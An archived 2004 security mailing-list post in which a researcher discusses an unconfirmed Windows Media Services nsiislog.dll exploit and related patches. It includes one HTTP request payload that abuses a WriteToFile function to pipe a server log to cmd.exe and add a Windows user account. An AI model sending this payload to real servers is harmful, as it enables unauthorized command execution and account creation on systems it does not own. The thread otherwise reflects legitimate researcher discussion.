Dailydave mailing list archives
Re: New mediaservices sploit
From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Sat, 13 Mar 2004 12:57:30 -0600
The code was posted to a few sites; it doesn't crash or exploit any version of nsiislog.dll that I could find. Tested multiple variations on a stock Windows 2000 SP0 system without any real result. I am assuming that since it's in CANVAS, it actually works on /something/. Are there any special circumstances required to trigger it? Does the MS03-019 patch have to be installed for it to be vulnerable to this MX_Stats overflow? It almost sounds like it is just another variation of the POST bug... is it also fixed by MS03-022?

Brett actually found three bugs in this ISAPI: the original chunked encoding one, then the POST content overflow, and finally the one which was released by M$ last week. Does anyone have details on the latest vuln?

Bonus points to anyone who can find a better way to exploit the unnamed bug^H^H^Hfeature below, without being dependent on an alternate web service or third-party software. The goal is instant command execution through writing a file to the system with arbitrary (even binary) contents. Writing to autoexec, startup, etc. doesn't work since it requires user interaction. Assuming Windows 2000 or newer. Writing ".job" files to \winnt\tasks doesn't work now that signatures are embedded (thanks Brett for the info).

GET /plugins/framework/script/tree.xms?obj=httpd:WriteToFile([$__installdir$]conf/portlisten.conf,Listen%208000%0A%0DAccessLog%20"|../../../../../../winnt/system32/cmd.exe%20/c%20net%20user%20P%20P%20/ADD"%0A%0D HTTP/1.0

-HD

On Saturday 13 March 2004 10:55, Dave Aitel wrote:
> Securityfocus's vulnerability database isn't really that good for accuracy. I checked out their update on this media services bug, and noticed that one of the sploits is for something that was never publicly released. This is a new bug, not the old bug that Brett Moore found.
>
> http://downloads.securityfocus.com/vulnerabilities/exploits/firew0rker.c
>
> (It's in CANVAS as well, btw)
>
> -dave
>
> _______________________________________________
> Dailydave mailing list
> Dailydave () lists immunitysec com
> http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- RE: New mediaservices sploit Brett Moore (Mar 14)
- RE: New mediaservices sploit Dave Aitel (Mar 14)
- Re: New mediaservices sploit Dave Aitel (Mar 13)
- Re: New mediaservices sploit H D Moore (Mar 13)
- Re: New mediaservices sploit wirepair (Mar 13)
- execution by WriteToFile? (was Re: New mediaservices sploit) Max Vision (Mar 14)